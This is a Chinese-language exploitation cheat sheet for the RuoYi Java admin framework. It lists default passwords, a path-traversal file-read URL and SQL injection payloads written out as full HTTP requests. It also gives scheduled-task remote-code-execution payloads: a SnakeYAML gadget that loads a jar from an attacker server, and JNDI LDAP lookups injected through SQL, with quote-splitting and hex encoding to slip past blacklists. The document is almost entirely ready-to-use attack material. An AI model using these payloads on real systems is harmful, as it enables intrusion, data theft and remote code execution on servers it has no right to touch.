1、ruoyi預設口令
admin/admin123
ruoyi/123456
2、前端shiro反序列化
版本過低,基本不能利用,使用反序列化工具不再過多介紹。
3、任意檔案讀取 Ruoyi <4.5.1
GET /common/download/resource?resource=/profile/../../../../../../../{filename}
4、SQL隱碼攻擊
4-1、/system/role/list路徑
post型
POST /system/role/list HTTP/1.1 Host: 127.0.0.1 User-Age nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 181 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/system/role Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
GET型
GET /system/role/list?pageSize=10&pageNum=1&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms%5BbeginTime%5D=¶ms%5BendTime%5D=¶ms%5BdataScope%5D=and+extractvalue(1,concat(0x7e,(select+database()),0x7e)) HTTP/1.1 Host: 127.0.0.1 User-Age nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 181 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/system/role Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
4-2、/system/dept/list路徑
POST /system/dept/list HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Connection: keep-alive
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Cookie:
sec-ch-ua-mobile: ?0
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Length: 0
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
5、定時任務
5-1、無限制定時任務利用
在vps配置好exp之後,在定時任務處新建定時任務
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps地址/yaml-payload.jar"]]]]')
0/10 * * * * ?
5-2、黑名單限制了呼叫字串
定時任務遮蔽ldap遠端呼叫
定時任務遮蔽http(s)遠端呼叫
定時任務遮蔽rmi遠端呼叫
org.yaml.snakeyaml.Yaml.load(‘!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [“h’t’t’p’://vps地址/yaml-payload.jar”]]]]’)
0/10 * * * * ?
5-3、呼叫類白名單限制
利用 genTableServiceImpl.createTable 方法來修改invoke_target為Jndi payload。
漏洞利用方式:
新建定時任務:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'NILF' WHERE job_id = 1;')
0/10 * * * * ?
此時若job_id為1的任務“呼叫目標字串”為NILF,則說明漏洞存在,則進一步利用。 實際攻擊payload為:
genTableServiceImpl.createTable("UPDATE sys_job SET invoke_target = \"javax.naming.InitialContext.lookup('ldap://ip:埠/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')\" WHERE job_id = 1;")
但是一般會禁用jndi,對value(javax.naming.InitialContext.lookup('ldap://ip:埠/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn'))轉換為16進位制繞過黑名單限制。 最終payload為:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e34342e38343a313338392f446573657269616c697a6174696f6e2f55524c444e532f656b777a6d787479696d2e64677268332e636e2729 WHERE job_id = 1;')